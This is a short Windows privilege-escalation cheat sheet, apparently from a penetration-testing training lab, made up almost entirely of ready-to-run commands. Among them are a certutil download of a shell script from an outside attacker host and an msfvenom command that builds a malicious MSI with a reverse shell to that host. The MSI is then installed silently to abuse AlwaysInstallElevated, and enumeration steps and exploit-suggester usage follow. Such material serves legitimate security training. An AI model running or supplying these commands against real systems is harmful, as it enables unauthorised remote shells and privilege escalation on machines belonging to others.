Other Commands

  1. Transfer file with certutil

    certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat
  2. Encode file with certutil

    certutil -encode file1 encodedfile
  3. Decode file with certutil

    certutil -decode encodedfile file2
  4. Query for the AlwaysInstallElevated registry key (HKCU)

    reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
  5. Query for the AlwaysInstallElevated registry key (HKLM)

    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
  6. Generate a malicious MSI package

    msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
  7. Execute an MSI package from the command line

    msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
  8. Enumerate scheduled tasks

    schtasks /query /fo LIST /v
  9. Enumerate scheduled tasks with PowerShell

    Get-ScheduledTask | select TaskName,State
  10. Check permissions on a directory

    .\accesschk64.exe /accepteula -s -d C:\Scripts\
  11. Check local user description field

    Get-LocalUser
  12. Enumerate computer description field

    Get-WmiObject -Class Win32_OperatingSystem | select Description
  13. Mount VMDK on Linux

    guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd
  14. Mount VHD/VHDX on Linux

    guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
  15. Update Windows Exploit Suggester database

    sudo python2.7 windows-exploit-suggester.py --update
  16. Running Windows Exploit Suggester

    python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
